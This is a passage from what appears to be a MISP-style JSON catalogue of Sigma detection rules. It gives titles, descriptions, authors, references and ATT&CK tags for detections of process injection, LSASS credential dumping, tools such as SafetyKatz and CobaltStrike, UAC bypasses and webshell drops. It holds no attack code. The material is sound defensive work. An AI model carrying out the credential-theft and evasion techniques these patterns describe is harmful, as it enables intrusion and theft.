], "filename": "create_remote_thread_win_powershell_susp_targets.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.011", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", "value": "Remote Thread Creation Via PowerShell In Uncommon Target" }, { "description": "Detects remote thread creation from CACTUSTORCH as described in references.", "meta": { "author": "@SBousseaden (detection), Thomas Patzke (rule)", "creation_date": "2019-02-01", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_hktl_cactustorch.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://twitter.com/SBousseaden/status/1090588499517079552", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1055.012", "attack.t1059.005", "attack.t1059.007", "attack.t1218.005" ] }, "related": [ { "dest-uuid": "b200542e-e877-4395-875b-cf1a44537ca4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", "value": "HackTool - CACTUSTORCH Remote Thread Creation" }, { "description": "Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", "meta": { "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "creation_date": "2018-11-30", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_hktl_cobaltstrike.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055.001" ] }, "related": [ { "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "value": "HackTool - Potential CobaltStrike Process Injection" }, { "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", "meta": { "author": "Thomas Patzke", "creation_date": "2017-02-19", "falsepositive": [ "Antivirus products" ], "filename": "create_remote_thread_win_susp_password_dumper_lsass.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml" ], "tags": [ "attack.credential-access", "attack.s0005", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", "value": "Password Dumper Remote Thread in LSASS" }, { "description": "Detects remote thread creation in the \"mstsc.exe\" process by a process located in a potentially suspicious location.\nThis technique is often used by attackers in order to hook some APIs used by DLLs loaded by \"mstsc.exe\" during RDP authentications in order to steal credentials.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-28", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_mstsc_susp_location.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "c0aac16a-b1e7-4330-bab0-3c27bb4987c7", "value": "Remote Thread Creation In Mstsc.Exe From Suspicious Location" }, { "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", "meta": { "author": "frack113", "creation_date": "2022-05-16", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_ttdinjec.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "value": "Remote Thread Creation Ttdinject.exe Proxy" }, { "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_powershell_lsass.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb656378-f909-47c1-8747-278bf09f4f4f", "value": "Potential Credential Dumping Attempt Via PowerShell Remote Thread" }, { "description": "Detects uncommon target processes for remote thread creation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-16", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_susp_uncommon_target_image.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055.003" ] }, "related": [ { "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "value": "Remote Thread Creation In Uncommon Target Image" }, { "description": "Detects uncommon processes creating remote threads.", "meta": { "author": "Perez Diego (@darkquassar), oscd.community", "creation_date": "2019-10-27", "falsepositive": [ "This rule is best put in testing first in order to create a baseline that reflects the data in your environment." ], "filename": "create_remote_thread_win_susp_relevant_source_image.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io", "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02d1d718-dd13-41af-989d-ea85c7fab93f", "value": "Rare Remote Thread Creation By Uncommon Source Image" }, { "description": "Detects a dump file written by QuarksPwDump password dumper", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-02-10", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_quarkspw_filedump.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_quarkspw_filedump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", "value": "HackTool - QuarksPwDump Dump File" }, { "description": "Detects the creation of the LiveKD driver by a process image other than \"livekd.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter" ], "filename": "file_event_win_sysinternals_livekd_driver_susp_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "059c5af9-5131-4d8d-92b2-de4ad6146712", "value": "LiveKD Driver Creation By Uncommon Process" }, { "description": "Detects the creation of a macro file for Outlook.", "meta": { "author": "@ScoubiMtl", "creation_date": "2021-04-05", "falsepositive": [ "User genuinely creates a VB Macro for their email" ], "filename": "file_event_win_office_outlook_macro_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1137", "attack.t1008", "attack.t1546" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "value": "New Outlook Macro Created" }, { "description": "Detect creation of suspicious executable file names.\nSome strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.\n", "meta": { "author": "frack113", "creation_date": "2022-09-05", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_executable_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74babdd6-a758-4549-9632-26535279e654", "value": "Suspicious Executable File Creation" }, { "description": "Detects the creation of a office macro file from a a suspicious process", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_office_macro_files_from_susp_process.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1c50487-1967-4315-a026-6491686d860e", "value": "Office Macro File Creation From Suspicious Process" }, { "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", "meta": { "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unknown" ], "filename": "file_event_win_msdt_susp_directories.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml" ], "tags": [ "attack.persistence", "attack.t1547.001", "cve.2022-30190" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", "value": "File Creation In Suspicious Directory By Msdt.EXE" }, { "description": "Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-07", "falsepositive": [ "Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive." ], "filename": "file_event_win_dump_file_susp_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "aba15bdd-657f-422a-bab3-ac2d2a0d6f1c", "value": "Potentially Suspicious DMP/HDMP File Creation" }, { "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-03", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/IDiagnosticProfileUAC", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "value": "UAC Bypass Using IDiagnostic Profile - File" }, { "description": "Detects the creation of new DLL assembly files by \"aspnet_compiler.exe\", which could be a sign of \"aspnet_compiler\" abuse to proxy execution through a build provider.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-14", "falsepositive": [ "Legitimate assembly compilation using a build provider" ], "filename": "file_event_win_aspnet_temp_files.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_aspnet_temp_files.yml" ], "tags": [ "attack.execution" ] }, "uuid": "4c7f49ee-2638-43bb-b85b-ce676c30b260", "value": "Assembly DLL Creation Via AspNetCompiler" }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_winrm_awl_bypass.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, { "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-07-03", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "file_event_win_susp_desktopimgdownldr_file.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "value": "Suspicious Desktopimgdownldr Target File" }, { "description": "TeamViewer_Desktop.exe is create during install", "meta": { "author": "frack113", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_install_teamviewer_desktop.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "value": "Installation of TeamViewer Desktop" }, { "description": "Detects default lsass dump filename generated by SafetyKatz.", "meta": { "author": "Markus Neis", "creation_date": "2018-07-24", "falsepositive": [ "Rare legitimate files with similar filename structure" ], "filename": "file_event_win_hktl_safetykatz.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SafetyKatz", "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", "value": "HackTool - SafetyKatz Dump Indicator" }, { "description": "Detects creation of a file with an \".rdp\" extension by an application that doesn't commonly create such files.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Unknown" ], "filename": "file_event_win_rdp_file_susp_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rdp_file_susp_creation.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "value": ".RDP File Created By Uncommon Application" }, { "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_wmp.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", "value": "UAC Bypass Using Windows Media Player - File" }, { "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-07", "falsepositive": [ "Administrative activity", "PowerShell scripts running as SYSTEM user" ], "filename": "file_event_win_susp_system_interactive_powershell.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "value": "Suspicious Interactive PowerShell as SYSTEM" }, { "description": "Detects programs on a Windows system that should not write an archive to disk", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_legitimate_app_dropping_archive.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", "value": "Legitimate Application Dropped Archive" }, { "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "Likely" ], "filename": "file_event_win_powershell_module_creation.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_creation.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e36941d0-c0f0-443f-bc6f-cb2952eb69ea", "value": "PowerShell Module File Created" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_winsat.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "value": "UAC Bypass Abusing Winsat Path Parsing - File" }, { "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", "meta": { "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_exchange_webshell_drop.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "value": "Suspicious ASPX File Drop by Exchange" }, { "description": "Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-02-05", "falsepositive": [ "Unknown" ], "filename": "file_event_win_sed_file_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", "https://en.wikipedia.org/wiki/IExpress", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sed_file_creation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "760e75d8-c3b5-409b-a9bf-6130b4c4603f", "value": "Self Extraction Directive File Created In Potentially Suspicious Location" }, { "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", "meta": { "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "creation_date": "2019-04-08", "falsepositive": [ "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" ], "tags": [ "attack.t1562.001", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3da70954-0f2c-4103-adff-b7440368f50e", "value": "Suspicious PROCEXP152.sys File Created In TMP" }, { "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", 